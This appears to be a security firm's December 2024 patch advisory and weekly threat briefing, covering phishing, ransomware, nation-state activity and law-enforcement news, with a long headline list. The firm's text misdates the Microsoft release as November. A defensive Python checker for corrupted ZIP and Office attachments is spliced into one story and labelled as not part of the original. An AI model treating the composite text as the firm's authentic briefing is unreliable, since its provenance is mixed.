Black Arrow Cyber Advisory 11 December 2024 – Microsoft, Ivanti, Adobe, and Chrome Security Updates
Executive summary
In line with Microsoft’s November Patch Tuesday, several vendors, including Ivanti, Adobe, and Google, have released security updates to fix vulnerabilities in their products. Microsoft has addressed 72 security issues, including a critical Windows Common Log File System (CLFS) vulnerability that is being actively exploited. Ivanti’s updates cover its Cloud Services Application (CSA), Connect Secure, Policy Secure, and Sentry products, fixing multiple critical vulnerabilities, one of which has the highest severity rating of 10, allowing unauthorised remote attackers to gain administrative access. Adobe has released patches for 168 security issues across various products, including Experience Manager, Connect, Animate, and InDesign. Google has updated Chrome to fix three high-severity vulnerabilities in the browser.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and of the organisation's data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of the products impacted by these vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and for all other vulnerabilities with a critical or high severity rating.
Microsoft
Further details on the specific updates in this Microsoft Patch Tuesday release can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec
Ivanti
Further details on specific updates across affected Ivanti products can be found here:
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540?language=en_US
Adobe
Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Chrome
Further details of the vulnerabilities in the Chrome Browser products can be found here:
https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_10.html
Black Arrow Cyber Threat Intelligence Briefing 06 December 2024
- Generative AI Makes Phishing Attacks More Believable and Cost-Effective
- Nearly Half a Billion Emails to Businesses Contain Malicious Content
- 65% of Office Workers Bypass Cyber Security to Boost Productivity
- Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States
- INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
- Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
- Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies
- UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs
- Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks
- Security Must Be Used as a Springboard, Not Just a Shield
- Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots
- Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Top Cyber Stories of the Last Week
Generative AI Makes Phishing Attacks More Believable and Cost-Effective
In a survey of 14,500 executives, IT and security professionals, and office workers, Ivanti found that phishing is the top threat increasing as a result of generative AI. Training is a vital element of security, and although 57% of organisations say they use anti-phishing training to protect themselves from sophisticated social engineering attacks, only 32% believe such training is “very effective”. A lack of skills is a major challenge for one in three security professionals. Real-time, accessible data is essential, yet 72% of IT and security data remain siloed.
Nearly Half a Billion Emails to Businesses Contain Malicious Content
A report by Hornetsecurity shows that over a third of all business emails in 2024 were unwanted, with 2.3% (around 427.8 million) containing malicious content. Phishing drove a third of all cyber attacks, while malicious URLs accounted for nearly a quarter. Reverse-proxy credential theft rose, using links instead of file attachments. Shipping brands like DHL and FedEx were the most impersonated. The data underscores the need for a zero-trust mindset and improved user awareness to strengthen defences against increasingly sophisticated threats.
65% of Office Workers Bypass Cyber Security to Boost Productivity
CyberArk found that 65% of office staff circumvent policies to improve their productivity, with half frequently reusing passwords and nearly a third sharing credentials. Over a third ignore important updates, and many use AI tools, often feeding sensitive data without adhering to guidelines. Senior executives are twice as likely to fall victim to phishing. The findings highlight the urgent need for identity-focused security strategies that enable efficient work while reducing risk.
Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States
EU cyber body ENISA reports a surge in hostile cyber activity across Europe, warning that escalating espionage, sabotage, violence, and disinformation threaten essential services and strategic interests. A successful attack on Europe’s key supply chains could have catastrophic cascading effects. Germany has formed a new task force to counter these threats before the federal election, while the UK’s national cyber agency confirms increased and more sophisticated hostile activity. Russia and China remain prominent cyber espionage threats. ENISA rates the threat to EU entities as “substantial”, as malicious cyber activity is deployed to manipulate events, destabilise societies, and undermine EU democracy and values.
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
INTERPOL’s latest global cyber crime crackdown led to over 5,500 arrests and seized more than $400 million in assets. Involving 40 countries, it dismantled a voice phishing operation that stole $1.1 billion from over 1,900 victims. Criminals impersonated law enforcement, exploiting digital currencies and undermining trust in financial systems. INTERPOL also warned of new scams using stablecoins and romance-themed lures to drain victims’ wallets. These results highlight the urgent need for international collaboration to counter large-scale cyber crime and protect individuals, businesses, and the integrity of digital economies.
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
A new phishing campaign is using corrupted ZIP archives and Office documents to bypass email security measures. Since August 2024, attackers have exploited the built-in recovery features of popular software to open seemingly broken files. Users are tricked by false promises like employee benefits, and once opened, these documents contain QR codes redirecting victims to malicious websites. The files evade most security filters while appearing to function normally. This highlights how attackers continually search for new techniques to slip past cyber security tools and compromise organisations’ systems and data.
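The evasion described above works because the malformed file is unreadable to the filter yet still opens through the application's recovery routine. A defensive check that turns this into a signal, added here as an example and not part of the original briefing: a gateway-style classifier in Python that treats any attachment claiming to be a ZIP or OOXML container (by extension or magic bytes) but failing to parse cleanly as suspect, instead of passing it through as "unknown". The function names, verdict labels and sample archives are assumptions constructed for this example.

```python
import io
import zipfile

ZIP_LOCAL_SIG = b"PK\x03\x04"   # local file header, the first bytes of any ZIP
ZIP_EOCD_SIG = b"PK\x05\x06"    # end-of-central-directory (EOCD) record
# Extensions that denote a ZIP container; OOXML Office files are ZIPs too.
ARCHIVE_EXTS = (".zip", ".docx", ".xlsx", ".pptx")
OFFICE_EXTS = (".docx", ".xlsx", ".pptx")
# Top-level parts a genuine Word, Excel or PowerPoint OOXML file carries.
OOXML_PARTS = ("word/", "xl/", "ppt/")


def classify_attachment(filename, data):
    """Return (verdict, reason). Verdicts: 'pass', 'suspect', 'not-archive'.

    'suspect' means the file claims to be a ZIP container but is not a
    well-formed one: a gateway should quarantine or detonate it rather
    than let it through just because it could not be scanned.
    """
    name = filename.lower()
    claims_archive = name.endswith(ARCHIVE_EXTS)
    has_local_sig = data.startswith(ZIP_LOCAL_SIG)
    # The EOCD record lies within the last 22 + 65535 bytes (max comment length).
    has_eocd = ZIP_EOCD_SIG in data[-(22 + 65535):]

    if not claims_archive and not has_local_sig:
        return "not-archive", "no ZIP extension and no ZIP signature"
    if claims_archive and not has_local_sig:
        return "suspect", "ZIP/Office extension but local-header signature missing"
    if not has_eocd:
        return "suspect", "ZIP signature present but EOCD record missing (truncated tail)"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            bad = zf.testzip()          # CRC and header check of every member
            if bad is not None:
                return "suspect", "member %r fails CRC or header check" % bad
            names = zf.namelist()
    except zipfile.BadZipFile as exc:
        return "suspect", "archive does not parse: %s" % exc
    if name.endswith(OFFICE_EXTS) and not any(n.startswith(OOXML_PARTS) for n in names):
        return "suspect", "Office extension but no word/, xl/ or ppt/ parts inside"
    return "pass", "well-formed container with %d member(s)" % len(names)


# --- constructed samples (not real campaign artefacts) ---------------------

# Minimal OOXML-shaped archive; enough structure for the checks above.
SAMPLE_DOCX_MEMBERS = {
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": "<w:document>sample text</w:document>",
}


def build_archive(members):
    """Build a stored (uncompressed) ZIP from {name: text}; constructed sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for member_name, text in members.items():
            zf.writestr(member_name, text)
    return buf.getvalue()


def truncate_archive(data, drop=40):
    """Constructed corruption: cut the tail so the EOCD record disappears."""
    return data[:-drop]


def corrupt_member(data, marker=b"sample text"):
    """Constructed corruption: flip one byte inside a stored member so its CRC fails."""
    idx = data.index(marker)
    return data[:idx] + bytes([data[idx] ^ 0xFF]) + data[idx + 1:]


if __name__ == "__main__":
    good = build_archive(SAMPLE_DOCX_MEMBERS)
    samples = [
        ("employee_benefits.docx", good),
        ("employee_benefits.docx", truncate_archive(good)),
        ("employee_benefits.docx", corrupt_member(good)),
        ("employee_benefits.docx", build_archive({"readme.txt": "hi"})),
        ("invoice.zip", b"this is not an archive"),
        ("notes.txt", b"plain text"),
    ]
    for fname, blob in samples:
        verdict, reason = classify_attachment(fname, blob)
        print("%-24s %-11s %s" % (fname, verdict, reason))
```

The design point is the fail-closed verdict: a filter that parses attachments should distinguish "well-formed and clean" from "could not be parsed", and route the latter to quarantine or sandbox detonation, since a file that no scanner can open but that the user's application will repair is exactly the shape this campaign relies on.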
Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies
British authorities uncovered a vast Russian-linked money laundering system connecting drug traffickers, cyber criminals and sanctioned elites, resulting in over 80 arrests worldwide. This billion-dollar operation relied on two Moscow-based firms to shift value across 30 countries using cryptocurrency, property and other assets. More than £20 million in cash and cryptocurrency has already been seized. New sanctions target senior figures behind the networks, aiming to disrupt their access to global financial systems. The investigation revealed that narcotics gangs, Russian state-linked espionage activities and cyber criminals all benefited, posing a significant threat to global security and financial stability.
UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs
The UK’s National Cyber Security Centre (NCSC) warns that organisations are underestimating state and criminal cyber threats. Hostile activity has increased, with severe incidents trebling to 12 last year. Ransomware attacks remain a major concern, targeting sectors from academia to healthcare. The centre responded to 430 serious incidents, up from 371 previously. Russia’s “aggression and recklessness” and China’s “sophisticated” attacks highlight how critical national infrastructure and key services remain vulnerable. The call is clear: organisations must strengthen defences to address these evolving threats, which pose a growing risk to both economic stability and public services.
Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks
The latest report from cyber security provider Gen shows a 614% quarterly rise in ‘scam-yourself’ cyber attacks, where victims unwittingly paste malicious code themselves. Tactics include fake tutorials, deceptive tech support, false CAPTCHA prompts and bogus updates. This spike coincides with a 39% surge in data-stealing malware and a 1154% increase in a popular information stealer. Such threats are reshaping the landscape, catching millions off-guard and driving urgent attention to robust cyber security solutions. Business leaders must foster greater awareness and invest in proactive, multilayered cyber security strategies to protect their organisations.
Security Must Be Used as a Springboard, Not Just a Shield
Many organisations still view cyber security as a necessary expense rather than a growth catalyst. Research suggests that embracing it as a strategic enabler can boost productivity, build customer trust, and strengthen competitiveness. It found that nearly half of surveyed organisations suffered more than 12 hours of downtime after a cyber attack, with a third experiencing a full day’s disruption. As more connected environments emerge, security leaders must highlight metrics like uptime and customer satisfaction to board members. By doing so, cyber security becomes a driver of operational resilience and long-term success, not just a shield against threats.
Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots
Only 1% of organisations recently surveyed received full reimbursement from their cyber insurance, and the average payout covered just 63% of incurred costs. Nearly half lacked clarity about what their policies covered. Common shortfalls arose when remediation expenses exceeded coverage limits or were not pre-approved, and when required security measures were not fully implemented. Strengthening cyber security practices increased the likelihood of better coverage, with more than three-quarters seeing improved terms after boosting cyber defences. Involving IT and security teams in insurance decisions and improving internal protections can help deliver more comprehensive and cost-effective cyber insurance in the future.
Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns
The FBI warns that cyber criminals increasingly use generative AI to create believable text, images, audio, and video. This allows them to scale their cyber crime operations and trick victims by avoiding usual warning signs. Criminals impersonate trusted individuals, forge identification, and run convincing investment or donation scams. The FBI suggests using a secret word with loved ones, being cautious with personal details, and watching for subtle inconsistencies. Confirm unsolicited calls or messages by independently contacting banks or authorities, and limit sharing personal images or voice recordings online as a precaution.
Sources:
https://www.helpnetsecurity.com/2024/12/06/genai-phishing-attacks-concerns/
https://www.helpnetsecurity.com/2024/12/04/employees-privileged-access-security-risk/
https://www.irishexaminer.com/news/arid-41529398.html
https://thehackernews.com/2024/12/interpol-arrests-5500-in-global.html
https://thehackernews.com/2024/12/hackers-use-corrupted-zips-and-office.html
https://therecord.media/russian-money-laundering-networks-trafficking-cybercrime-kremlin
https://betanews.com/2024/11/29/security-must-be-used-as-a-springboard-not-just-a-shield/
https://cybernews.com/security/cybercriminals-using-ai-for-most-types-of-scams-fbi/
Governance, Risk and Compliance
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Security must be used as a springboard, not just a shield
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra
CISOs will face growing challenges in 2025 and beyond | Computer Weekly
CISOs in 2025: Evolution of a High-Profile Role
65% of employees bypass cyber security policies, driven by hybrid work and flexible access
Why Operational Risk Planning Is Crucial For Every SME
Large And Small Businesses Face More Serious Repercussions From Cyber Threats | HackerNoon
Incident Response Playbooks: Are You Prepared?
63% of companies plan to pass data breach costs to customers | CSO Online
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
How to talk to your board about tech debt | CIO
Navigating the Changing Cyber Security Regulations Landscape
The Rising Tide of Cyber Threats: Stay Ahead, Fortify Defences - The Futurum Group
Employees suffering compliance and security fatigue | theHRD
Building a robust security posture with limited resources - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Strikes when Organisations Unknowingly Open the Door | Security Info Watch
Does Cyber Insurance Drive Up Ransom Demands?
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
No company too small for Phobos ransomware gang, indictment reveals | Malwarebytes
Storm-1811 exploits RMM tools to drop Black Basta ransomware
Ransomware attacks on critical sectors ramped up in November | TechTarget
Hackers are pivoting from data breaches to business shutdowns
Wanted Russian Hacker Linked to Hive and LockBit Ransomware Arrested
Ransomware's Grip on Healthcare
Ransomware Costs Manufacturing Sector $17bn in Downtime - Infosecurity Magazine
Ransomware Victims
UK hospital resorts to paper and postpones procedures after cyber attack
Arrowe Park: 'Longer A&E wait times' continue after cyber attack - BBC News
Cyber attack hits three NHS Liverpool hospitals | UKAuthority
Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra
Ransomware Attack Disrupts Operations at US Contractor ENGlobal - Infosecurity Magazine
Bologna FC Hit By 200GB Data Theft and Ransom Demand - Infosecurity Magazine
Stoli Vodka and Kentucky Owl File for Bankruptcy Following Cyber Attack, Russian Seizures | NTD
Vodka maker Stoli files for bankruptcy in US after ransomware attack
Phishing & Email Based Attacks
Novel phishing campaign uses corrupted Word documents to evade security
Corrupted Word Files Fuel Sophisticated Phishing Campaign - Infosecurity Magazine
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
Nearly half a billion emails to businesses contain malicious content, Hornet Security report finds
KnowBe4 Releases the Latest Phishing Trends Report
GenAI makes phishing attacks more believable and cost-effective - Help Net Security
New Rockstar 2FA phishing service targets Microsoft 365 accounts
North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks
HR and IT are among top-clicked phishing subjects
Top Five Industries Aggressively Targeted By Phishing Attacks
Don't Fall For This "Sad Announcement" Phishing Scam
Defending Against Email Attachment Scams - Security Boulevard
Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media
This sneaky phishing attack is a new take on a dirty old trick | PCWorld
Phishing attacks rose by more than 600% in the buildup to Black Friday | Security Magazine
Other Social Engineering
Why You Must Beware Of Dangerous New Scam-Yourself Cyber Attacks
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
Spotting the Charlatans: Red Flags for Enterprise Security Teams - SecurityWeek
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Artificial Intelligence
GenAI makes phishing attacks more believable and cost-effective - Help Net Security
Cyber criminals already using AI for most types of scams, FBI warns | Cybernews
How laws strain to keep pace with AI advances and data theft | ZDNET
FBI Warns GenAI is Boosting Financial Fraud - Infosecurity Magazine
Teenagers leading new wave of cyber crime - Help Net Security
Cyber security professionals call for AI regulations
Cyber security in 2025: AI threats & zero trust focus
Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat
Treat AI like a human: Redefining cyber security - Help Net Security
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records
25% of enterprises using AI will deploy AI agents by 2025 | ZDNET
2FA/MFA
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
Malware
North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks
Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica
Venom Spider Spins Web of MaaS Malware
Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
New Windows Backdoor Security Warning For Bing, Dropbox, Google Users
More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader
Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media
SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine
ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan
Security Bite: Threat actors are widely using AI to build Mac malware - 9to5Mac
'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims
Mobile
8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play
SMEs put at risk by poor mobile security practices
New DroidBot Android malware targets 77 banking, crypto apps
Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
The FBI now says encryption is good for you – Computerworld
NSO Group's Pegasus Spyware Detected in New Mobile Devices
Business leaders among Pegasus spyware victims, says security firm | TechCrunch
Smartphone Security Warning—Make Changes Now Or Become A Victim
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Top 5 Mobile Security Risks for Enterprises - Zimperium
Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges
This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena
Banking apps can now require recent Android security updates
Denial of Service/DoS/DDoS
Misconfigured WAFs Heighten DoS, Breach Risks
How DDoS attacks are shaping esports security and risk management | Insurance Business America
Internet of Things – IoT
From Patchwork to Framework: Towards a Global IoT Security Paradigm - Infosecurity Magazine
Chinese LIDAR Dominance a Cyber Security Threat, Warns Think Tank - Infosecurity Magazine
Data Breaches/Leaks
Russian hacking software used to steal hundreds of MoD log-ins
760,000 Employee Records From Several Major Firms Leaked Online - SecurityWeek
Sadiq Khan admits some commuters may never be refunded after TfL cyber attack
Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online
White FAANG Data Export Attack: A Gold Mine for PII Threats
63% of companies plan to pass data breach costs to customers | CSO Online
Deloitte Hacked - Brain Cipher Group Allegedly Stolen 1 TB of Data
Process over top-down enforcement: prevent data leaks
Lessons in cyber security from the Internet Archive Breaches | TechRadar
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records
Israeli tech firm Silicom denies Iranian claims of Mossad and Unit 8200 links after c | Ctech
Controversial Andrew Tate ‘War Room’ Videos Leaked By Hackers
Organised Crime & Criminal Actors
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
How laws strain to keep pace with AI advances and data theft | ZDNET
UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine
Alleged Snowflake Hacker ‘Danger’ to the Public
Russia gives life sentence to Hydra dark web kingpin • The Register
Venom Spider Spins Web of MaaS Malware
Teenagers leading new wave of cyber crime - Help Net Security
Cyber criminals already using AI for most types of scams, FBI warns | Cybernews
German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine
Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown
Eurocops red pill the Matrix 'secure' criminal chat systems • The Register
Police seizes largest German online crime marketplace, arrests admin
Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers
Scattered Spider Hacking Gang Arrests Mount with California Teen
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hackers Stole $1.49 Billion in Cryptocurrency to Date in 2024 - SecurityWeek
How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
New DroidBot Android malware targets 77 banking, crypto apps
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers
Insider Risk and Insider Threats
65% of employees bypass cyber security policies, driven by hybrid work and flexible access
Inside threats: How can companies improve their cyber hygiene?
Insider Threats vs. Privacy: A Dilemma for IT Professionals
Process over top-down enforcement: prevent data leaks
Macy’s found a single employee hid up to $154 million worth of expenses | CNN Business
Insurance
Does Cyber Insurance Drive Up Ransom Demands?
Cyber insurance checklist: 12 must-have security features | SC Media
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
Supply Chain and Third Parties
Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar
Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra
Hardening Links in Supply Chain Security | SC Media UK
Fear of cyber attack outweighs investment in security along the supply chain - The Loadstar
Cloud/SaaS
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
New Rockstar 2FA phishing service targets Microsoft 365 accounts
5 things you should never back up to the cloud
New Windows Backdoor Security Warning For Bing, Dropbox, Google Users
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Outages
Identity and Access Management
The New Cyber Frontier: Managing Risks in Distributed Teams - Infosecurity Magazine
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Encryption
The Growing Quantum Threat to Enterprise Data: What Next?
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
The FBI now says encryption is good for you – Computerworld
This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena
Linux and Open Source
70% of open-source components are poorly or no longer maintained - Help Net Security
Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica
New Report Highlights Open Source Trends And Security Challenges
Passwords, Credential Stuffing & Brute Force Attacks
Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
Six password takeaways from the updated NIST cybersecurity framework
Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat
Social Media
Tech Support Scams Exploit Google Ads to Target Users | Tripwire
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian
Malvertising
Tech Support Scams Exploit Google Ads to Target Users | Tripwire
Regulations, Fines and Legislation
How laws strain to keep pace with AI advances and data theft | ZDNET
EC takes action as member states miss NIS2 directive deadline
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra
DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra
New EU Regulation Establishes European 'Cyber Security Shield' - SecurityWeek
Cyber Security: Council of EU formally adopts Cybersecurity and Cyber Solidarity Act | Practical Law
Cyber security professionals call for AI regulations
Navigating the Changing Cyber Security Regulations Landscape
Employees suffering compliance and security fatigue | theHRD
Models, Frameworks and Standards
EC takes action as member states miss NIS2 directive deadline
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
New NIST Guidance Offers Update on Gauging Cyber Performance
DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra
Six password takeaways from the updated NIST cybersecurity framework
Careers, Working in Cyber and Information Security
Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK
Optimism About Cyber Workforce Advancements | AFCEA International
World Wide Work: Landing a Cyber Security Career Overseas
Law Enforcement Action and Take Downs
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
Alleged Snowflake Hacker ‘Danger’ to the Public
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine
Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown
US arrests Scattered Spider suspect linked to telecom hacks
UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine
Misinformation, Disinformation and Propaganda
Cyber Attacks Could Impact Romanian Presidential Race, Officials Claim - Infosecurity Magazine
German intelligence agency warns of 'foreign interference' in upcoming elections
Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Cyberwarfare 2025: The rise of AI weapons, zero-days, and state-sponsored chaos
Cyber warfare rising across EU in bid to 'destabilise' member states
NATO promises better strategy against cyber attacks and undersea cables – Euractiv
UK Underestimates Threat Of Cyber-Attacks, NCSC | Silicon UK
Nation State Actors
China
Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks
US government says Salt Typhoon is still in telecom networks | CyberScoop
Microsoft spots another China spy crew stealing US data • The Register
US org suffered four month intrusion by Chinese hackers
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
Government Guidance on Chinese Telco Hacking Highlights Threat to Cisco Devices - SecurityWeek
The FBI now says encryption is good for you – Computerworld
US shares tips to block hackers behind recent telecom breaches
T-Mobile CSO: Cyber spies' initial access method 'is novel' • The Register
US critical infrastructure, military at risk of Chinese LiDAR tech compromise | SC Media
Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine
Russia
NATO promises better strategy against cyber attacks and undersea cables – Euractiv
‘Russia can turn the lights off’: how the UK is preparing for cyberwar | Cyberwar | The Guardian
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
Germany’s cyber security and infrastructure under attack by Russia, chancellor says – POLITICO
Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
NCA Disrupts Multi-Billion Dollar Russian Money Laundering Network
She Was a Russian Socialite and Influencer. Cops Say She’s a Crypto Laundering Kingpin | WIRED
Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024
Russian programmer says FSB agents planted spyware on his Android phone | TechCrunch
Spy v Spy: Russian APT Turla Caught Stealing From Pakistani APT - SecurityWeek
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
Ransomware suspect Wazawaka reportedly arrested by Russia | The Record from Recorded Future News
Russia gives life sentence to Hydra dark web kingpin • The Register
Putin and ransomware blamed for Stoli US bankruptcy filing • The Register
'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims
Romania's election systems targeted in over 85,000 cyber attacks
Russian hacking software used to steal hundreds of MoD log-ins
Iran
Kash Patel, Trump's pick to lead FBI, hit with Iranian cyber attack, sources say - ABC News
North Korea
North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks
How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
Kimsuky Group Adopts New Phishing Tactics to Target Victims - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine
Polish Central Banker Testifies in Pegasus Spyware Case – BNN Bloomberg
How widespread is mercenary spyware? More than you think - Help Net Security
Study shows potentially higher prevalence of spyware infections than previously thought | CyberScoop
NSO Group's Pegasus Spyware Detected in New Mobile Devices
Business leaders among Pegasus spyware victims, says security firm | TechCrunch
A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus Infections | WIRED
How a Russian man’s harrowing tale shows the physical dangers of spyware | CyberScoop
Tools and Controls
65% of office workers bypass cyber security to boost productivity - Help Net Security
Storm-1811 exploits RMM tools to drop Black Basta ransomware
5 reasons to double down on network security - Help Net Security
Misconfigured WAFs Heighten DoS, Breach Risks
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
Incident Response Playbooks: Are You Prepared?
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Why Robust API Security is a Must for Your Business - Security Boulevard
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK
Six password takeaways from the updated NIST cybersecurity framework
Does Cyber Insurance Drive Up Ransom Demands?
Insider Threats vs. Privacy: A Dilemma for IT Professionals
New NIST Guidance Offers Update on Gauging Cyber Performance
Shorter Lifespan Reduces Digital Certificate Vulns
How to talk to your board about tech debt | CIO
Modernizing incident response in the era of cloud and AI - TechTalks
Other News
Hackers Can Access Laptop Webcams Without Activating LED Indicator
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
71% of US Adults Have Dangerous Online Security Habits This Year, CNET Survey Finds - CNET
Sadiq Khan admits some commuters may never be refunded after TfL cyber attack
